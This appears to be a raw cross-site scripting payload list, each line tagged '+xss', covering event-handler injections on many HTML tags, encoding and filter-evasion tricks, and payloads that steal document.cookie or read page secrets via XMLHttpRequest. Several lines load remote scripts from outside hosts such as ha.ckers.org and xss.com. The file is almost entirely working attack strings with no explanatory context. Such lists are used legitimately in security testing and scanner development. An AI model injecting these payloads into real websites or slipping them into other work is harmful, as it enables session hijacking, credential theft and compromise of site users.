+xss,'<video draggable="true" ondragstart="alert(1)">test</video>' +xss,'<video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video>' +xss,'<video id=x controls onfocusin=alert(1)><source src="validvideo.mp4" type=video/mp4></video>' +xss,'<video id=x tabindex=1 onactivate=alert(1)></video>' +xss,'<video id=x tabindex=1 onbeforeactivate=alert(1)></video>' +xss,'<video id=x tabindex=1 onbeforedeactivate=alert(1)></video><input autofocus>' +xss,'<video id=x tabindex=1 ondeactivate=alert(1)></video><input id=y autofocus>' +xss,'<video onbeforecopy="alert(1)" contenteditable>test</video>' +xss,'<video onbeforecut="alert(1)" contenteditable>test</video>' +xss,'<video onbeforepaste="alert(1)" contenteditable>test</video>' +xss,'<video onblur=alert(1) tabindex=1 id=x></video><input autofocus>' +xss,'<video oncanplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>' +xss,'<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>' +xss,'<video onclick="alert(1)">test</video>' +xss,'<video oncontextmenu="alert(1)">test</video>' +xss,'<video oncopy="alert(1)" contenteditable>test</video>' +xss,'<video oncut="alert(1)" contenteditable>test</video>' +xss,'<video ondblclick="alert(1)">test</video>' +xss,'<video onfocusout=alert(1) tabindex=1 id=x></video><input autofocus>' +xss,'<video onkeydown="alert(1)" contenteditable>test</video>' +xss,'<video onkeypress="alert(1)" contenteditable>test</video>' +xss,'<video onkeyup="alert(1)" contenteditable>test</video>' +xss,'<video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>' +xss,'<video onmousedown="alert(1)">test</video>' +xss,'<video onmouseenter="alert(1)">test</video>' +xss,'<video onmouseleave="alert(1)">test</video>' +xss,'<video onmousemove="alert(1)">test</video>' +xss,'<video onmouseout="alert(1)">test</video>' +xss,'<video onmouseover="alert(1)">test</video>' +xss,'<video onmouseup="alert(1)">test</video>' +xss,'<video onpaste="alert(1)" contenteditable>test</video>' +xss,'<video src/onerror=alert(1)>' +xss,'<video><source onerror=alert(1) src=1></video>' +xss,'<video><track default onload=alert(1) src="data:text/vtt,WEBVTT"></video>' +xss,'<wbr draggable="true" ondrag="alert(1)">test</wbr>' +xss,'<wbr draggable="true" ondragend="alert(1)">test</wbr>' +xss,'<wbr draggable="true" ondragenter="alert(1)">test</wbr>' +xss,'<wbr draggable="true" ondragleave="alert(1)">test</wbr>' +xss,'<wbr draggable="true" ondragstart="alert(1)">test</wbr>' +xss,'<wbr id=x tabindex=1 onactivate=alert(1)></wbr>' +xss,'<wbr id=x tabindex=1 onbeforeactivate=alert(1)></wbr>' +xss,'<wbr id=x tabindex=1 onbeforedeactivate=alert(1)></wbr><input autofocus>' +xss,'<wbr id=x tabindex=1 ondeactivate=alert(1)></wbr><input id=y autofocus>' +xss,'<wbr id=x tabindex=1 onfocus=alert(1)></wbr>' +xss,'<wbr id=x tabindex=1 onfocusin=alert(1)></wbr>' +xss,'<wbr onbeforecopy="alert(1)" contenteditable>test</wbr>' +xss,'<wbr onbeforecut="alert(1)" contenteditable>test</wbr>' +xss,'<wbr onbeforepaste="alert(1)" contenteditable>test</wbr>' +xss,'<wbr onblur=alert(1) tabindex=1 id=x></wbr><input autofocus>' +xss,'<wbr onclick="alert(1)">test</wbr>' +xss,'<wbr oncontextmenu="alert(1)">test</wbr>' +xss,'<wbr oncopy="alert(1)" contenteditable>test</wbr>' +xss,'<wbr oncut="alert(1)" contenteditable>test</wbr>' +xss,'<wbr ondblclick="alert(1)">test</wbr>' +xss,'<wbr onfocusout=alert(1) tabindex=1 id=x></wbr><input autofocus>' +xss,'<wbr onkeydown="alert(1)" contenteditable>test</wbr>' +xss,'<wbr onkeypress="alert(1)" contenteditable>test</wbr>' +xss,'<wbr onkeyup="alert(1)" contenteditable>test</wbr>' +xss,'<wbr onmousedown="alert(1)">test</wbr>' +xss,'<wbr onmouseenter="alert(1)">test</wbr>' +xss,'<wbr onmouseleave="alert(1)">test</wbr>' +xss,'<wbr onmousemove="alert(1)">test</wbr>' +xss,'<wbr onmouseout="alert(1)">test</wbr>' +xss,'<wbr onmouseover="alert(1)">test</wbr>' +xss,'<wbr onmouseup="alert(1)">test</wbr>' +xss,'<wbr onpaste="alert(1)" contenteditable>test</wbr>' +xss,'<xmp draggable="true" ondrag="alert(1)">test</xmp>' +xss,'<xmp draggable="true" ondragend="alert(1)">test</xmp>' +xss,'<xmp draggable="true" ondragenter="alert(1)">test</xmp>' +xss,'<xmp draggable="true" ondragleave="alert(1)">test</xmp>' +xss,'<xmp draggable="true" ondragstart="alert(1)">test</xmp>' +xss,'<xmp id=x tabindex=1 onactivate=alert(1)></xmp>' +xss,'<xmp id=x tabindex=1 onbeforeactivate=alert(1)></xmp>' +xss,'<xmp id=x tabindex=1 onbeforedeactivate=alert(1)></xmp><input autofocus>' +xss,'<xmp id=x tabindex=1 ondeactivate=alert(1)></xmp><input id=y autofocus>' +xss,'<xmp id=x tabindex=1 onfocus=alert(1)></xmp>' +xss,'<xmp id=x tabindex=1 onfocusin=alert(1)></xmp>' +xss,'<xmp onbeforecopy="alert(1)" contenteditable>test</xmp>' +xss,'<xmp onbeforecut="alert(1)" contenteditable>test</xmp>' +xss,'<xmp onbeforepaste="alert(1)" contenteditable>test</xmp>' +xss,'<xmp onblur=alert(1) tabindex=1 id=x></xmp><input autofocus>' +xss,'<xmp onclick="alert(1)">test</xmp>' +xss,'<xmp oncontextmenu="alert(1)">test</xmp>' +xss,'<xmp oncopy="alert(1)" contenteditable>test</xmp>' +xss,'<xmp oncut="alert(1)" contenteditable>test</xmp>' +xss,'<xmp ondblclick="alert(1)">test</xmp>' +xss,'<xmp onfocusout=alert(1) tabindex=1 id=x></xmp><input autofocus>' +xss,'<xmp onkeydown="alert(1)" contenteditable>test</xmp>' +xss,'<xmp onkeypress="alert(1)" contenteditable>test</xmp>' +xss,'<xmp onkeyup="alert(1)" contenteditable>test</xmp>' +xss,'<xmp onmousedown="alert(1)">test</xmp>' +xss,'<xmp onmouseenter="alert(1)">test</xmp>' +xss,'<xmp onmouseleave="alert(1)">test</xmp>' +xss,'<xmp onmousemove="alert(1)">test</xmp>' +xss,'<xmp onmouseout="alert(1)">test</xmp>' +xss,'<xmp onmouseover="alert(1)">test</xmp>' +xss,'<xmp onmouseup="alert(1)">test</xmp>' +xss,'<xmp onpaste="alert(1)" contenteditable>test</xmp>' +xss,'<xss id=x tabindex=1 onactivate=alert(1)></xss>' +xss,'<xss id=x tabindex=1 onbeforeactivate=alert(1)></xss>' +xss,'<xss id=x tabindex=1 onbeforedeactivate=alert(1)></xss><input autofocus>' +xss,'<xss id=x tabindex=1 onblur=alert(1)></xss><input autofocus>' +xss,'<xss id=x tabindex=1 ondeactivate=alert(1)></xss><input autofocus>' +xss,'<xss id=x tabindex=1 onfocus=alert(1)></xss>' +xss,'<xss id=x tabindex=1 onfocusin=alert(1)></xss>' +xss,'<xss id=x tabindex=1 onfocusout=alert(1)></xss><input autofocus>' +xss,''%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E' +xss,'<<scr\0ipt/src=http://xss.com/xss.js></script' +xss,'%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E' +xss,'' onmouseover=alert(/XSS/)' +xss,'"><iframe%20src="http://google.com"%%203E' +xss,''<script>window.onload=function(){document.forms[0].message.value='1';}</script>' +xss,'x”</title><img src%3dx onerror%3dalert(1)>' +xss,'<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>' +xss,'<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>' +xss,'<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>' +xss,'<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>' +xss,'<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>' +xss,'<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>' +xss,'<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>' +xss,'<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>' +xss,'<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>' +xss,'<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>' +xss,'<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>' +xss,'<script>alert(document.head.innerHTML.substr(146,20));</script>' +xss,'<script>alert(document.head.childNodes[3].text)</script>' +xss,'<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>' +xss,'<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>' +xss,'<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>' +xss,'<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>' +xss,'<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>' +xss,'<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>' +xss,'<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>' +xss,'<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>' +xss,'<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>' +xss,'<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>' +xss,'<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #' +xss,'<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #' +xss,'<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#' +xss,'<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#' +xss,'<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23' +xss,'<script for=document event=onreadystatechange>getElementById('safe123').click()</script>' +xss,'<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>' +xss,'<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>' +xss,'<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>' +xss,'<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>' +xss,'<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>' +xss,'<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>' +xss,'<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#' +xss,'<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();' +xss,'<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>' +xss,'<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>' +xss,'<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();' +xss,'<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>' +xss,'<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();' +xss,'<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>' +xss,'<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>' +xss,'<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();' +xss,'%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E' +xss,'<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>' +xss,'<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E' +xss,'<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>' +xss,'<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>' +xss,'<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();' +xss,'Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>' +xss,'<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>' +xss,'<div onmouseover='alert&lpar;1&rpar;'>DIV</div>' +xss,'<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">' +xss,'<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>' +xss,'<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?' +xss,'<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?' +xss,'<var onmouseover="prompt(1)">On Mouse Over</var>?' +xss,'<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>' +xss,'<img src="/" =_=" title="onerror='prompt(1)'">' +xss,'<%<!--'%><script>alert(1);</script -->' +xss,'<script src="data:text/javascript,alert(1)"></script>' +xss,'<iframe/src \/\/onload = prompt(1)' +xss,'<iframe/onreadystatechange=alert(1)' +xss,'<svg/onload=alert(1)' +xss,'<input value=<><iframe/src=javascript:confirm(1)' +xss,'<input type="text" value=``<div/onmouseover='alert(1)'>X</div>' +xss,'http://www.<script>alert(1)</script .com' +xss,'<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?' +xss,'<svg><script ?>alert(1)' +xss,'<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>' +xss,'<img src=`xx:xx`onerror=alert(1)>' +xss,'<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>' +xss,'<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>?' +xss,'<math><a xlink:href="//jsfiddle.net/t846h/">click' +xss,'<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?' +xss,'<svg contentScriptType=text/vbs><script>MsgBox+1' +xss,'<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a' +xss,'<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>' +xss,'<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+' +xss,'<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F' +xss,'<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ????????????' +xss,'<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>' +xss,'<script>+-+-1-+-+alert(1)</script>' +xss,'<body/onload=&lt;!--&gt;&#10alert(1)>' +xss,'<script itworksinallbrowsers>/*<script* */alert(1)</script ?' +xss,'<img src ?itworksonchrome?\/onerror = alert(1)???' +xss,'<svg><script>//&NewLine;confirm(1);</script </svg>' +xss,'<svg><script onlypossibleinopera:-)> alert(1)' +xss,'<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe' +xss,'<script x> alert(1) </script 1=2' +xss,'<div/onmouseover='alert(1)'> style="x:">' +xss,'<--`<img/src=` onerror=alert(1)> --!>' +xss,'<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?' +xss,'<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?' +xss,'"><img src=x onerror=window.open('https://www.google.com/');>' +xss,'<form><button formaction=javascript&colon;alert(1)>CLICKME' +xss,'<math><a xlink:href="//jsfiddle.net/t846h/">click' +xss,'<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?' +xss,'<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>' +xss,'<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>' +xss,'"><img src=x onerror=prompt(1);>' +xss,'<SCRIPT>alert('XSS');</SCRIPT>' +xss,''';!--"<XSS>=&{()}' +xss,'<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>' +xss,'<IMG SRC="javascript:alert('XSS');">' +xss,'<IMG SRC=javascript:alert('XSS')>' +xss,'<IMG SRC=JaVaScRiPt:alert('XSS')>' +xss,'<IMG SRC=javascript:alert(&quot;XSS&quot;)>' +xss,'<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>' +xss,'<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>' 